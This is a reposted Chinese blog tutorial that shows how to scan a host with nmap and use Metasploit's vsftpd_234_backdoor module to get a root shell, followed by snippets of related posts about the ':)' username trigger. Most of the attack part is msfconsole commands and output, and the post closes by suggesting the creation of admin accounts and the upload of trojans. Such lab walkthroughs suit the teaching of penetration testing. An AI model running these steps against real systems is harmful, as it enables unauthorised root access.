metasploit利用vsftpd漏洞获取root权限

最新推荐文章于 2024-06-20 20:17:58 发布
最新推荐文章于 2024-06-20 20:17:58 发布
阅读量421 收藏 1
点赞数
文章标签: python 网络
原文链接:https://my.oschina.net/u/147181/blog/164797
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

vsftpd version 2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限。这里用backtrack 集成的metasploit做测试,metasploit集成了各种各样的漏洞,我们可以在上面利用服务器、个人PC和应用程序的漏洞。开始菜单路径backtrack/Exploitation tools/Network Exploitation tools/metasploitFramework/msfconsole,进入metasploit命令行界面:
28005306_RrFX.jpg
用metasploit内置的nmap进行主机扫描,nmap -sT -A 192.168.1.101, -sT 是指用隐蔽的tcp进行连接,-A是指在探测中对服务进行详细的版本测试。nmap是一款强大的扫描工具,简单的一些用法请点击http://www.yeetrack.com/?p=8,扫描结果:
28005308_YdvY.jpg
结果显示目标主机上运行着ftp服务器,版本为vsftpd2.3.4,这个版本的vsftpd存在漏洞,攻击者可以远程获取目标主机的root权限。
下面利用metasploit实施攻击过程,进入metasploit命令行,search vsftpd,搜索有关vsftpd的相关工具和攻击载荷。查找结果如下:
msf > search vsftpd
Matching Modules
================
Name                                  Disclosure Date          Rank       Description
----                                  ---------------          ----       -----------
exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution
利用该漏洞, 命令: use exploit/unix/ftp/vsftpd_234_backdoor  ,这样提示符就会提示进入到该路径下,show options查看需要设置的相关项:
msf  exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  21               yes       The target port
Exploit target:
Id  Name
--  ----
0   Automatic
提示需要设置RHOST(攻击目标的IP)、RPORT(目标端口),由于这里是攻击ftp软件,端口默认为21,我们设置一下目标的ip,命令: set rhost 192.168.1.101, 在输入show options回车,确认下参数设置正确。检查无误,输入命令help,查看相关的操纵,一般是run或者exploit即可实施攻击,结果如图:
28005309_dEWy.jpg
结果显示已经获取了目标主机的root权限,建立管理员账号、上传木马等动作就可以开始了。
本文由youthflies发表在易踪网上的原创文章,本文地址:http://www.yeetrack.com/?p=229

转载于:https://my.oschina.net/u/147181/blog/164797

weixin_34268579
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit2 - tcp port 21 - vsftpd
Nixawk
07-29 1340
Metasploitable2: tcp port 21 - vsftpd Metasploitable2的21号端口,运行的是vsftp服务。该版本的源码被攻击者植入了后门。后门很快被移除,但是还是有部分人下载了它。如果登录的用户名结尾是“:)”[笑脸],那么在6200端口会监听一个后门. msf> use exploit/unix/ftp/vsftpd_234_ba
metasploitable2渗透:Metasploit攻击VSFTPD2.3.4后门漏洞
qq_43054896的博客
03-25 2440
攻击机 kali:192.168.88.147 靶机 metasploitable2:192.168.88.135 一、主机探测,信息收集 1、利用masscan进行主机端口扫描 使用masscan主要是为了进行快速扫描,查看目标主机metasploitable是否在线,开放端口有哪些 masscan -p 0-65535 --rate 100000 192.168.88.135 根据开放...
vsftpd FTP Server lsc远程拒绝服务漏洞
07-03
vsftpd是Very Secure FTP daemon的缩写,是UNIX类平台上安全的FTP服务器。 vsftpd在处理ls.c时存在远程拒绝服务漏洞,远程攻击者可利用漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
系统安全之笑脸漏洞vsftpd2.3.4) Metasploitable2.0的俩种攻击方式
最新发布
xt350488的博客
06-20 441
靶机(Metasploitable2)ip: 192.168.209.135攻击机(kali)ip:192.168.209.130。
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
漏洞利用 --- VSFTPD 2.3.4 后门
weixin_62443409的博客
06-09 9286
VSFTPD 2.3.4 的攻击就是通过向21端口发送一个特定字节的序列来触发恶意的vsf_sysutil_extra()函数。一旦成功执行,就会在系统的6200端口打开一个后门,从而进行利用
笑脸漏洞(vsftpd 2.3.4)
qq_52321992的博客
07-12 955
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。“vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1051
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
metasploitable2 漏洞合集学习
qq_43233085的博客
02-05 4620
metasploitable2 漏洞合集学习弱密码 Weak PasswordSamba MS-RPC Shell命令注入漏洞Vsftpd 源码包后门漏洞UnreallRCd 后门漏洞Java RMI SERVER 命令执行漏洞Root用户弱口令漏洞(SSH爆破)Distcc 后门漏洞PHP CGI 参数注入执行漏洞Druby 远程代码执行漏洞Ingreslock 后门漏洞Rlogin 后门漏洞 ...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4477
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
VSFTPD2.3.4(笑脸漏洞)复现
柠檬i的博客
10-29 1837
vsftpd2.3.4在ftp认证时,如果用户名带有 " :) " ,那么6200端口就会存在一个root权限的shell,可以直接连接。
VSFTPD v2.3.4 著名笑脸漏洞
aiwodouai的博客
12-14 2700
VSFTPD v2.3.4 著名笑脸漏洞
vsftpd笑脸漏洞
qq_70303095的博客
04-26 243
ftp笑脸漏洞原理在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root。
metasploitable切换到root用户
蔡小小的博客
01-13 1192
先要进入设置root账号密码:sudo passwd root 输入msfadmin账号密码:msfadmin 设置root账号密码:********* 确认密码:********* 切换root账号:su root
笑脸漏洞vsftpd-2.3.4
inskeyzh的博客
11-12 3713
一、介绍 vsftpd存在一个后门漏洞,虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。 vsftpd程序服务端会接收来自用户输入的用户名和密码,只要用户输入的用户名中包含连续的“:”和“)”字符,就会自动在6200端口打开一个后门。 二、准备 1.kali主机 2.靶机Metasploitable2-Linux 如未安装好以上虚拟机,可参考以下链接 Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教
利用MetasploitVSFTPD2.3.4渗透攻击提权
渗透测试
05-06 1814
文章目录前言一、Metasploit中使用数据库二、利用msf中nmap扫描三、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.提权总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~
笑脸漏洞(VSFTPD2.3.4)复现
aarong的博客
11-01 8348
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
vsftpd2.3.4笑脸漏洞
weixin_51909453的博客
11-02 4859
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig查看靶机ip192.168.179.129 2、打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.
metasploit windows漏洞利用
09-20
Metloit是一款开源的安全漏洞...你可以使用Metasploit演示攻击不同漏洞,比如Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)。攻击成功后,你将能够在攻击机和目标机之间建立一个Shell连接,从而渗透Windows系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值